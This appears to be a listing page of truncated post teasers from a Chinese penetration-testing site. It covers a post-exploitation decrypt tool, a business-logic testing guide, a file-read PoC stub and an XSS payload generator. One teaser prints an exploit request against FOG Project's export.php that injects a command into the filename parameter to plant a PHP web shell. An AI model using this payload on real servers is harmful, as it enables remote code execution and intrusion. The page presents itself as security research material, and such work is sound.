秃兔
【工具】DecryptTools综合加解密后渗透工具
此分类下所有工具都来源于互联网公开收集整理,请将工具用于安全研究、本地虚拟机环境测试。请勿从事互联网非法测试!!! 在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已...
【渗透文库】账户暂停/恢复场景业务逻辑测试
测试描述:通过抓包工具分析账户暂停/恢复场景的接口内容及工作流程,逐条实施案例验证是否存在业务逻辑漏洞。若场景涉及认证要素,则参考对应的认证要素测试方式。 测试标签:WEB应用安全测试 ...
fogproject系统接口export.php存在远程命令执行漏洞
POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd'”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1Host: 192.168.15.5Content-Length: 21Use...
科荣 AIO 管理系统任意文件读取
import base64import requests def poc(ip, file_path): # 构造URL地址url = f’http://{ip}/UtilServlet’headers = { 登录可见余下内容
紫兔XSS测试自定义生成器
2025(V2版本即将完成接入Deepseek) 当前版本 紫兔XSS测试自定义生成器 地址https://www.tutusec.com/%e7%b4%ab%e5%85%94xss%e6%b5%8b%e8%af%95%e8%87%aa%e5%ae%9a%e4%b9%89%e7%94%9f%e6%88%90...
